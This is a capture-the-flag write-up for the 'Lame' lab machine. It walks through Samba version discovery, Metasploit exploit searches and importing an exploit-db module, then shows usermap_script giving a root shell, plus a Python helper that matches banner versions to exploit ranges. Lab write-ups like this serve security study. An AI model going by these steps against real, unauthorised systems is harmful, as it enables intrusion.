Lame (Samba)

10.10.10.3

scan

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Linux OS


This box should be easy, I've done this before: port 139 -> smbclient

Same as the Kioptrix VM (Samba on port 139)


smbclient gives the service version: Samba 3.0.20-Debian

Attempt 1:


locate exploits/linux/remote/9950.rb
[*] exec: locate exploits/linux/remote/9950.rb

/root/exploit-database/exploits/linux/remote/9950.rb
/usr/share/exploitdb/exploits/linux/remote/9950.rb

msfconsole
search -h
search platform:linux type:exploit samba
   Name                                     Disclosure Date  Rank       Check  Description
   ----                                     ---------------  ----       -----  -----------
   exploit/linux/samba/chain_reply          2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/is_known_pipename    2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   exploit/linux/samba/lsa_transnames_heap  2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap   2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open           2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans              2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow

use exploit/linux/samba/setinfopolicy_heap
show options 
Check the Exploit target:
2: 3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10
The exploit target doesn't match (Samba 3.5.11 on Ubuntu, not 3.0.20 on Debian), so:
back


Importing an external exploit module into msf

cd /root/.msf4/modules/exploits/
mkdir samba3.0.21-3.0.24 
cd samba*
cp /root/exploit-database/exploits/linux/remote/9950.rb .

Restart msfconsole
search samba3

Then I suddenly noticed the target version doesn't meet the condition: this exploit covers Samba 3.0.21-3.0.24, and the target runs 3.0.20.

Orz, too careless.

Attempt 2:

"Samba < 3.0.20 - Remote Heap Overflow": the exploit is C source that has to be compiled and run, and the comments are in Italian... (and, read strictly, "< 3.0.20" doesn't cover 3.0.20 either).

Attempt 3:

Googling "Samba 3.0.20" turns up https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

exploit/multi/samba/usermap_script


Running it drops straight into a root shell. The module description covers Samba 3.0.20 through 3.0.25rc3 with the non-default 'username map script' smb.conf option set, so this time the version actually matches.
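The common thread in all three attempts is checking the banner version against what each exploit actually covers before firing it. As an added example (not part of the original write-up), a small Python helper that parses the Samba banner and filters the candidates above by their claimed version ranges. The ranges for setinfopolicy_heap, 9950.rb and the "< 3.0.20" exploit are the ones stated in the notes above; the usermap_script range (3.0.20 through 3.0.25rc3) is taken from the Metasploit module description. The pre-release ordering (rc sorts below the final release) is an assumption of this helper, not something the page shows.

```python
import re

# Banner the notes above got from smbclient / nmap for 10.10.10.3.
TARGET_BANNER = "Samba 3.0.20-Debian"

# Candidate exploits and the version range each one claims to cover.
# First three ranges: from the notes above (msf target, 9950.rb directory
# name, exploit title). usermap_script: Metasploit module description.
CANDIDATES = {
    "exploit/linux/samba/setinfopolicy_heap (target 2)": "== 3.5.11",
    "9950.rb (Samba 3.0.21-3.0.24)": "3.0.21 - 3.0.24",
    "Samba < 3.0.20 - Remote Heap Overflow (EDB, C source)": "< 3.0.20",
    "exploit/multi/samba/usermap_script": "3.0.20 through 3.0.25rc3",
}

# Dotted version, optionally followed directly by a pre-release tag like rc3.
VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)(?:(rc|beta|alpha)(\d+))?", re.IGNORECASE)

# Pre-release tags sort below the final release of the same number (assumption).
PRE_ORDER = {"alpha": 0, "beta": 1, "rc": 2}
FINAL = 3


def parse_version(text):
    """Turn 'Samba 3.0.20-Debian' or '3.0.25rc3' into a comparable tuple.

    Distro suffixes such as '-Debian' or '~dfsg-1ubuntu2' are ignored; only
    the first dotted version in the string counts.
    """
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums += (0,) * (4 - len(nums))  # pad so 3.0 and 3.0.0 compare equal
    if m.group(2):
        return nums + (PRE_ORDER[m.group(2).lower()], int(m.group(3)))
    return nums + (FINAL, 0)


def parse_range(spec):
    """Parse an exploit's version claim into (low, high, high_inclusive).

    Accepted forms: '3.0.21 - 3.0.24', '3.0.20 through 3.0.25rc3',
    '< 3.0.20' (exclusive upper bound, no lower bound) and '== 3.5.11'.
    """
    versions = [parse_version(m.group(0)) for m in VERSION_RE.finditer(spec)]
    if spec.lstrip().startswith("<"):
        if len(versions) != 1:
            raise ValueError(f"bad upper-bound spec {spec!r}")
        return None, versions[0], False
    if len(versions) == 1:
        return versions[0], versions[0], True
    if len(versions) == 2:
        return versions[0], versions[1], True
    raise ValueError(f"cannot parse range {spec!r}")


def covers(version, rng):
    """True if the parsed version falls inside the (low, high, inclusive) range."""
    low, high, inclusive = rng
    if low is not None and version < low:
        return False
    return version <= high if inclusive else version < high


def triage(banner, candidates=CANDIDATES):
    """Names of the candidates whose claimed range includes the banner's version."""
    v = parse_version(banner)
    return [name for name, spec in candidates.items() if covers(v, parse_range(spec))]


if __name__ == "__main__":
    print(f"target: {TARGET_BANNER} -> {parse_version(TARGET_BANNER)}")
    usable = triage(TARGET_BANNER)
    for name, spec in CANDIDATES.items():
        mark = "x" if name in usable else " "
        print(f"  [{mark}] {name:55} {spec}")
```

For the 3.0.20-Debian banner only usermap_script survives the filter, which is the result the three attempts above reached by hand; running the helper against 3.0.25 versus 3.0.25rc3 also shows why the "rc3" at the end of a range matters.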